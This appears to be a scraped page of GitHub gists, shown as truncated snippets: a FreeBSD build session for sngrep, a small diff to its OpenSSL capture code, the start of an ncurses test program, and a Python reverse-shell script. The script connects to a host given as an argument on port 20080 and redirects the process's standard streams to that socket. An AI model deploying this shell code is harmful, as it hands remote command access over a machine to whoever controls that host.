This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Release FAQ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Release FAQ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket, pty, os, sys | |
| RHOST = sys.argv[1] | |
| RPORT = 20080 | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((RHOST, RPORT)) | |
| os.dup2(s.fileno(),0); | |
| os.dup2(s.fileno(),1); | |
| os.dup2(s.fileno(),2) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Index: src/capture_openssl.c | |
| =================================================================== | |
| --- src/capture_openssl.c (revision 1010) | |
| +++ src/capture_openssl.c (working copy) | |
| @@ -520,7 +520,6 @@ | |
| 0); | |
| break; | |
| - case new_session_ticket: | |
| case finished: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [root@freebsd ~]# freebsd-version | |
| 10.2-RELEASE | |
| [root@freebsd /usr/src/sngrep]# clang --version | |
| FreeBSD clang version 3.4.1 (tags/RELEASE_34/dot1-final 208032) 20140512 | |
| Target: x86_64-unknown-freebsd10.2 | |
| Thread model: posix | |
| [root@freebsd ~]# cd /usr/src/ | |
| [root@freebsd /usr/src]# git clone https://github.com/irontec/sngrep | |
| Cloning into 'sngrep'... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <ncurses.h> | |
| #include <stdio.h> | |
| #include <ctype.h> | |
| /* | |
| * gcc -o ncurses_intest ncurses_intest.c -lncurses && ./ncurses_intest | |
| */ | |
| int main() | |
| { |